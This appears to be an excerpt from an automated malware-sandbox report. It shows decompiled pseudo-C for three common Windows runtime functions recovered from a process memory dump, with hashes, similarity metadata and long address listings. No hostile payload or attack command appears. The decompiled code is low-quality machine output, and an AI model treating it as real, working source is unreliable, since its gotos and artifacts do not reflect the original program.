                                                                                                                                0x04f57a21
                                                                                                                                0x00000000
                                                                                                                                0x04f57a21
                                                                                                                                0x04eec650
                                                                                                                                0x04eec651
                                                                                                                                0x04eec656
                                                                                                                                0x04eec65c
                                                                                                                                0x04eec65d
                                                                                                                                0x04eec663
                                                                                                                                0x04eec664
                                                                                                                                0x04eec66a
                                                                                                                                0x04eec66e
                                                                                                                                0x04f579c5
                                                                                                                                0x04f579c7
                                                                                                                                0x00000000
                                                                                                                                0x04f579c7
                                                                                                                                0x04eec67a
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID: InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                • Opcode ID: ba17a153c46f613e960007e8b6e19506a295851e6274c950cfafde5ff80317b8
                                                                                                                                • Instruction ID: 351015ade9f54b771affc4790ae25c773e22c3a7411f34294f7c6ef4929a1b09
                                                                                                                                • Opcode Fuzzy Hash: ba17a153c46f613e960007e8b6e19506a295851e6274c950cfafde5ff80317b8
                                                                                                                                • Instruction Fuzzy Hash: F6819376A042429FDB25EE14C880E7B77E5FB84354F14486AEE45DB264E330FD46CBA2
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F7B8D0, Relevance: .2, Instructions: 199COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 39%
                                                                                                                                			E04F7B8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x4fd7b9c; // 0x0
				_t124 = L04F04620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E04F29800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E04F295B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E04F295D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L04F077F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E04F29910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E04F295D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x4fd7b9c; // 0x0
									_t92 = L04F04620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E04F29910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E04EEA7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E04F7E7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E04F7E7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E04F295B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                                                                                                0x04f7b8d9
                                                                                                                                0x04f7b8e4
                                                                                                                                0x00000000
                                                                                                                                0x04f7b8e6
                                                                                                                                0x04f7b8f3
                                                                                                                                0x04f7b8f5
                                                                                                                                0x04f7b8f5
                                                                                                                                0x04f7b8f8
                                                                                                                                0x04f7b920
                                                                                                                                0x04f7b924
                                                                                                                                0x04f7b936
                                                                                                                                0x04f7b939
                                                                                                                                0x04f7b93d
                                                                                                                                0x04f7b948
                                                                                                                                0x04f7b9a0
                                                                                                                                0x04f7b9a0
                                                                                                                                0x04f7b9a4
                                                                                                                                0x04f7b9bf
                                                                                                                                0x04f7b9c4
                                                                                                                                0x04f7b9c6
                                                                                                                                0x04f7b9cd
                                                                                                                                0x04f7b9d1
                                                                                                                                0x04f7bad4
                                                                                                                                0x04f7bad8
                                                                                                                                0x04f7bada
                                                                                                                                0x04f7badc
                                                                                                                                0x04f7badc
                                                                                                                                0x04f7badf
                                                                                                                                0x04f7bae0
                                                                                                                                0x04f7bae2
                                                                                                                                0x04f7bae4
                                                                                                                                0x04f7baec
                                                                                                                                0x04f7baee
                                                                                                                                0x04f7baf0
                                                                                                                                0x04f7baf0
                                                                                                                                0x04f7baec
                                                                                                                                0x04f7bafb
                                                                                                                                0x04f7bafc
                                                                                                                                0x04f7bafe
                                                                                                                                0x04f7bb01
                                                                                                                                0x04f7bb01
                                                                                                                                0x00000000
                                                                                                                                0x04f7bb06
                                                                                                                                0x04f7b9d7
                                                                                                                                0x04f7b9db
                                                                                                                                0x04f7b9db
                                                                                                                                0x04f7b9de
                                                                                                                                0x04f7b9de
                                                                                                                                0x04f7b9e4
                                                                                                                                0x04f7b9e7
                                                                                                                                0x04f7b9ea
                                                                                                                                0x04f7b9ec
                                                                                                                                0x04f7b9ef
                                                                                                                                0x04f7b9f3
                                                                                                                                0x04f7ba1b
                                                                                                                                0x04f7ba1b
                                                                                                                                0x04f7ba23
                                                                                                                                0x04f7ba24
                                                                                                                                0x04f7ba27
                                                                                                                                0x04f7ba2a
                                                                                                                                0x04f7ba2b
                                                                                                                                0x04f7ba2e
                                                                                                                                0x04f7ba30
                                                                                                                                0x04f7ba37
                                                                                                                                0x04f7ba3f
                                                                                                                                0x04f7ba9c
                                                                                                                                0x04f7baa2
                                                                                                                                0x04f7bb13
                                                                                                                                0x04f7bb15
                                                                                                                                0x04f7baae
                                                                                                                                0x04f7baae
                                                                                                                                0x04f7bab3
                                                                                                                                0x04f7bab5
                                                                                                                                0x04f7baba
                                                                                                                                0x04f7bac8
                                                                                                                                0x04f7bac8
                                                                                                                                0x04f7baba
                                                                                                                                0x04f7bacd
                                                                                                                                0x04f7bacf
                                                                                                                                0x00000000
                                                                                                                                0x04f7bacf
                                                                                                                                0x04f7bb1a
                                                                                                                                0x00000000
                                                                                                                                0x04f7bb1c
                                                                                                                                0x04f7baa7
                                                                                                                                0x04f7bb11
                                                                                                                                0x00000000
                                                                                                                                0x04f7bb11
                                                                                                                                0x04f7baa9
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f7ba41
                                                                                                                                0x04f7ba41
                                                                                                                                0x04f7ba41
                                                                                                                                0x04f7ba58
                                                                                                                                0x04f7ba5d
                                                                                                                                0x04f7ba62
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f7ba64
                                                                                                                                0x04f7ba67
                                                                                                                                0x04f7ba68
                                                                                                                                0x04f7ba69
                                                                                                                                0x04f7ba6c
                                                                                                                                0x04f7ba6f
                                                                                                                                0x04f7ba71
                                                                                                                                0x04f7ba78
                                                                                                                                0x04f7ba80
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f7ba90
                                                                                                                                0x04f7ba90
                                                                                                                                0x04f7ba97
                                                                                                                                0x00000000
                                                                                                                                0x04f7ba97
                                                                                                                                0x04f7b9f5
                                                                                                                                0x04f7b9f7
                                                                                                                                0x04f7b9f7
                                                                                                                                0x04f7b9fa
                                                                                                                                0x04f7ba03
                                                                                                                                0x04f7ba07
                                                                                                                                0x04f7ba0c
                                                                                                                                0x04f7ba10
                                                                                                                                0x04f7ba17
                                                                                                                                0x00000000
                                                                                                                                0x04f7b9f7
                                                                                                                                0x04f7b9a6
                                                                                                                                0x04f7b9a8
                                                                                                                                0x04f7b9af
                                                                                                                                0x04f7b9b3
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f7b9b9
                                                                                                                                0x00000000
                                                                                                                                0x04f7b9b9
                                                                                                                                0x04f7b94d
                                                                                                                                0x04f7b98f
                                                                                                                                0x04f7b995
                                                                                                                                0x04f7b999
                                                                                                                                0x04f7b960
                                                                                                                                0x04f7b967
                                                                                                                                0x04f7b968
                                                                                                                                0x04f7b96a
                                                                                                                                0x00000000
                                                                                                                                0x04f7b96a
                                                                                                                                0x04f7b99b
                                                                                                                                0x04f7b99e
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04f7b99e
                                                                                                                                0x04f7b951
                                                                                                                                0x04f7b954
                                                                                                                                0x04f7b95a
                                                                                                                                0x04f7b95e
                                                                                                                                0x04f7b972
                                                                                                                                0x04f7b979
                                                                                                                                0x04f7b97d
                                                                                                                                0x04f7b97f
                                                                                                                                0x04f7b980
                                                                                                                                0x04f7b982
                                                                                                                                0x04f7b984
                                                                                                                                0x00000000
                                                                                                                                0x04f7b984
                                                                                                                                0x00000000
                                                                                                                                0x04f7b926
                                                                                                                                0x00000000
                                                                                                                                0x04f7b926

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 499bf429b92c508cf1a58616e3596fd746357d721c59fda98a26ea5a96f46da0
                                                                                                                                • Instruction ID: 792d9e7d37b5f6b805ec39deb24e2588add8a254691ef0c34e47b03c8f4c70f8
                                                                                                                                • Opcode Fuzzy Hash: 499bf429b92c508cf1a58616e3596fd746357d721c59fda98a26ea5a96f46da0
                                                                                                                                • Instruction Fuzzy Hash: 0C71FC32600701AFE7219F28CD45F66B7F5EF41728F10452AEA658B2A1EB78F942CB50
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04F66DC9, Relevance: .2, Instructions: 199COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 79%
                                                                                                                                			E04F66DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L04F04620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E04F66B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E04F07D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E04F29AE0();
					_t87 = L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E04F6795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E04F6795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E04F6795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E04F6795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L04F04620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E04F66B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E04F66B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E04F66B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E04F66B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E04F07D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E04F29AE0();
								L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L04F02400( &_v36);
							if(_v24 >= 0) {
								_t87 = L04F02400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L04F02400( &_v52);
							}
							if(_v28 >= 0) {
								return L04F02400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                                                                                                0x04f66dd4
                                                                                                                                0x04f66dde
                                                                                                                                0x04f66de1
                                                                                                                                0x04f66de3
                                                                                                                                0x04f66de6
                                                                                                                                0x04f66de9
                                                                                                                                0x04f66dec
                                                                                                                                0x04f66def
                                                                                                                                0x04f66df2
                                                                                                                                0x04f66df5
                                                                                                                                0x04f66dfe
                                                                                                                                0x04f66e04
                                                                                                                                0x04f66e09
                                                                                                                                0x04f66e0d
                                                                                                                                0x04f66e18
                                                                                                                                0x04f66e1b
                                                                                                                                0x04f66e22
                                                                                                                                0x04f66e2d
                                                                                                                                0x04f66e30
                                                                                                                                0x04f66e36
                                                                                                                                0x04f66e42
                                                                                                                                0x04f66e4d
                                                                                                                                0x04f66e50
                                                                                                                                0x04f66e55
                                                                                                                                0x04f66e5c
                                                                                                                                0x04f66e6e
                                                                                                                                0x04f66e5e
                                                                                                                                0x04f66e67
                                                                                                                                0x04f66e67
                                                                                                                                0x04f66e73
                                                                                                                                0x04f66e74
                                                                                                                                0x04f66e77
                                                                                                                                0x04f66e7c
                                                                                                                                0x04f66e7d
                                                                                                                                0x04f66e8e
                                                                                                                                0x04f66e93
                                                                                                                                0x04f66e9c
                                                                                                                                0x04f66ea8
                                                                                                                                0x04f66eab
                                                                                                                                0x04f66eac
                                                                                                                                0x04f66eb3
                                                                                                                                0x04f66ecd
                                                                                                                                0x04f66edc
                                                                                                                                0x04f66ee2
                                                                                                                                0x04f66ee5
                                                                                                                                0x04f66ef2
                                                                                                                                0x04f66efb
                                                                                                                                0x04f66f01
                                                                                                                                0x04f66f06
                                                                                                                                0x04f66f0b
                                                                                                                                0x04f66f11
                                                                                                                                0x04f66f1a
                                                                                                                                0x04f66f22
                                                                                                                                0x04f66f26
                                                                                                                                0x04f66f26
                                                                                                                                0x04f66f33
                                                                                                                                0x04f66f41
                                                                                                                                0x04f66f44
                                                                                                                                0x04f66f47
                                                                                                                                0x04f66f54
                                                                                                                                0x04f66f65
                                                                                                                                0x04f66f77
                                                                                                                                0x04f66f7c
                                                                                                                                0x04f66f82
                                                                                                                                0x04f66f91
                                                                                                                                0x04f66f99
                                                                                                                                0x04f66fa3
                                                                                                                                0x04f66fae
                                                                                                                                0x04f66fae
                                                                                                                                0x04f66fba
                                                                                                                                0x04f66fbb
                                                                                                                                0x04f66fbc
                                                                                                                                0x04f66fc1
                                                                                                                                0x04f66fc2
                                                                                                                                0x04f66fd3
                                                                                                                                0x04f66fd8
                                                                                                                                0x04f66fd8
                                                                                                                                0x04f66fdf
                                                                                                                                0x04f66fe8
                                                                                                                                0x04f66fee
                                                                                                                                0x04f66fee
                                                                                                                                0x04f66ff5
                                                                                                                                0x04f66ffb
                                                                                                                                0x04f66ffb
                                                                                                                                0x04f67004
                                                                                                                                0x00000000
                                                                                                                                0x04f6700a
                                                                                                                                0x04f67004
                                                                                                                                0x04f66eb3
                                                                                                                                0x04f66e9c
                                                                                                                                0x04f67015

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000F.00000002.929694645.0000000004EC0000.00000040.00000001.sdmp, Offset: 04EC0000, based on PE: true
                                                                                                                                • Associated: 0000000F.00000002.929826443.0000000004FDB000.00000040.00000001.sdmp Download File
                                                                                                                                • Associated: 0000000F.00000002.929843770.0000000004FDF000.00000040.00000001.sdmp Download File
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                                                                • Instruction ID: 5ab1739a34dccdcf50e654c07be82eee1761b955bfeda6f6900ad473976dba5e
                                                                                                                                • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                                                                                                • Instruction Fuzzy Hash: 63716071E00619EFEB10EFA4C984A9EBBF9FF48714F104069E505E7290D730BA42CB90
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 04EE52A5, Relevance: .2, Instructions: 161COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                C-Code - Quality: 78%
                                                                                                                                			E04EE52A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E04EFEEF0(0x4fd79a0);
					_t104 =  *0x4fd8210;
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E04EFEB70(_t93, 0x4fd79a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E04F29890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E04EFEEF0(0x4fd79a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E04EFEB70(0, 0x4fd79a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x3001ead
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E04F1F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E04EFEEF0(0x4fd79a0);
									__eflags =  *0x4fd8210 - _t104; // 0x3001ea0
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x4fd8210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E04F64888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E04EFEB70(_t95, 0x4fd79a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E04F295D0();
											L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E04F295D0();
											L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E04EFEB70(_t93, 0x4fd79a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E04F295D0();
										L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E04F295D0();
										L04F077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E04F1F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                                                                                                0x04ee52a5
                                                                                                                                0x04ee52ad
                                                                                                                                0x04ee52b0
                                                                                                                                0x04ee52b3
                                                                                                                                0x04ee52b7
                                                                                                                                0x04ee52ba
                                                                                                                                0x04ee52bf
                                                                                                                                0x04ee52c4
                                                                                                                                0x04ee52cc
                                                                                                                                0x00000000
                                                                                                                                0x00000000
                                                                                                                                0x04ee52ce
                                                                                                                                0x04ee52d9
                                                                                                                                0x04ee52dd
                                                                                                                                0x04ee52e7
                                                                                                                                0x04ee52f7
                                                                                                                                0x04ee52f9
                                                                                                                                0x04ee52fd
                                                                                                                                0x04f40dcf
                                                                                                                                0x04f40dd5
                                                                                                                                0x04f40dd6
                                                                                                                                0x04f40dd7
                                                                                                                                0x04f40dd8
                                                                                                                                0x04f40dd9
                                                                                                                                0x04f40dde
                                                                                                                                0x04f40ddf
                                                                                                                                0x04f40de0
                                                                                                                                0x04f40de1
                                                                                                                                0x04f40de2
                                                                                                                                0x04f40de5
                                                                                                                                0x04f40dea
                                                                                                                                0x04f40dec
                                                                                                                                0x04f40f60
                                                                                                                                0x04f40f64
                                                                                                                                0x04f40f70
                                                                                                                                0x04f40f76
                                                                                                                                0x04f40f79
                                                                                                                                0x04f40f79
                                                                                                                                0x00000000
                                                                                                                                0x04f40f64
                                                                                                                                0x04f40df2
                                                                                                                                0x04f40df7
                                                                                                                                0x04f40e04
                                                                                                                                0x04f40e0d
                                                                                                                                0x04f40e0d
                                                                                                                                0x04f40e10
                                                                                                                                0x04f40e1a
                                                                                                                                0x04f40e1c
                                                                                                                                0x04f40e4c
                                                                                                                                0x04f40e52
                                                                                                                                0x04f40e61
                                                                                                                                0x04f40e67
                                                                                                                                0x04f40e6b
                                                                                                                                0x04f40e70
                                                                                                                                0x04f40e76
                                                                                                                                0x04f40ed7
                                                                                                                                0x04f40edc
                                                                                                                                0x04f40ee0
                                                                                                                                0x04f40ee6
                                                                                                                                0x04f40eea
                                                                                                                                0x04f40eed
                                                                                                                                0x04f40ef0
                                                                                                                                0x04f40ef3
                                                                                                                                0x04f40ef6
                                                                                                                                0x04f40ef9
                                                                                                                                0x04f40efe
                                                                                                                                0x04f40f01
                                                                                                                                0x04f40f01
                                                                                                                                0x04f40f0b
                                                                                                                                0x04f40f12
                                                                                                                                0x04f40f16
                                                                                                                                0x04f40f18
                                                                                                                                0x04f40f1b
                                                                                                                                0x04f40f2c
                                                                                                                                0x04f40f31
                                                                                                                                0x04f40f31
                                                                                                                                0x04f40f35
                                                                                                                                0x04f40f39
                                                                                                                                0x04f40f3a
                                                                                                                                0x04f40f3c
                                                                                                                                0x04f40f3f
                                                                                                                                0x04f40f50
                                                                                                                                0x04f40f55
                                                                                                                                0x04f40f55
                                                                                                                                0x04f40f59
                                                                                                                                0x04ee52eb
                                                                                                                                0x04ee52f1
                                                                                                                                0x04ee52f1
                                                                                                                                0x04f40e7d
                                                                                                                                0x04f40e84
                                                                                                                                0x04f40e88
                                                                                                                                0x04f40e8a
                                                                                                                                0x04f40e8d
                                                                                                                                0x04f40e9e
                                                                                                                                0x04f40ea3
                                                                                                                                0x04f40ea3
